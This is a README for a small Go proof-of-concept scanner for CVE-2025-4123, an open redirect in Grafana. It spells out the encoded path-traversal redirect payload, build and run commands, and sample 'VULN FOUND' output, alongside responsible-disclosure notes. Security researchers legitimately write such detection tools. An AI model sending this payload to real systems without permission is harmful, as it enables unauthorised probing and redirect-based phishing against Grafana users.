CVE-2025-4123 Grafana Open Redirect Exploit# CVE-2025-4123 PoC
**A small proof-of-concept tool** — sends a specific payload to a target and checks for 301/302 redirect responses, reporting the `Location` header.
> This repository is intended for educational/research purposes only. Follow responsible disclosure policies. Below are usage and build instructions.
---
## Summary
This tool sends a request to a domain with the following payload appended, and if the server responds with 301 (Moved Permanently) or 302 (Found), it checks the `Location` header to detect a potential vulnerability.
Payload: `/public/..%2F%5cgoogle.com%2F%3f%2F..%2F..`
The program disables Go's automatic redirect following via the `CheckRedirect` function, allowing inspection of the initial response.
---
## Requirements
* Go 1.20+ (or any recent Go version)
* Internet access (for the target domain)
---
## Build
You can build an executable (Windows `.exe`) with the following commands:
```bash
# Linux/macOS
go build -o cve-2025-4123 main.go
# Windows (PowerShell or CMD)
go build -o CVE-2025-4123.exe main.go
```
---
## Usage
```
Usage: CVE-2025-4123.exe [https://example.com]
```
Example:
```bash
./CVE-2025-4123.exe https://target.example.com
```
The program does the following:
* Sends a GET request to the provided domain (`os.Args[1]`) with the payload appended.
* If the response is 301 or 302, it prints the `Location` header: `VULN FOUND: <location>`
* Otherwise, it prints `CVE-2025-4123 Not Found`.
* Any redirected requests are also printed via the `CheckRedirect` callback: `Redirected to <URL>`.
---
## Example Output
Successful detection (example):
```
VULN FOUND: https://google.com/
```
Redirect tracking via `CheckRedirect` callback might output:
```
Redirected to https://google.com/
```
---
## Notes
* By default, `http.Get` automatically follows 301/302 redirects. In this PoC, `CheckRedirect` is used to disable automatic following, allowing direct access to the `Location` header.
* The `Location` header may not always be an absolute URL; it could be relative or in another format. In such cases, use `url.Parse` and `resp.Request.URL.ResolveReference` to construct the full URL.
* Do not test on systems without permission. Unauthorized testing may be illegal.
---
## Development / Improvement Suggestions
* Add CLI argument validation and flags like `--timeout`.
* Add output options `-o/--output` to save results in JSON or CSV.
* Implement parallel scanning (concurrency) carefully to avoid overloading targets.
* Handle empty or unexpected `Location` headers with robust parsing/normalization.
---
## Responsible Disclosure
If this PoC detects a real vulnerability, contact the target organization's security team and report it responsibly. Coordinate with the organization before making any public disclosure.
---
[4.0K] /data/pocs/56e449822af030a5c24cae4042768ecae293c569
├── [7.9M] CVE-2025-4123.exe
├── [ 21] go.mod
├── [3.3K] main.go
└── [2.8K] README.md
1 directory, 4 files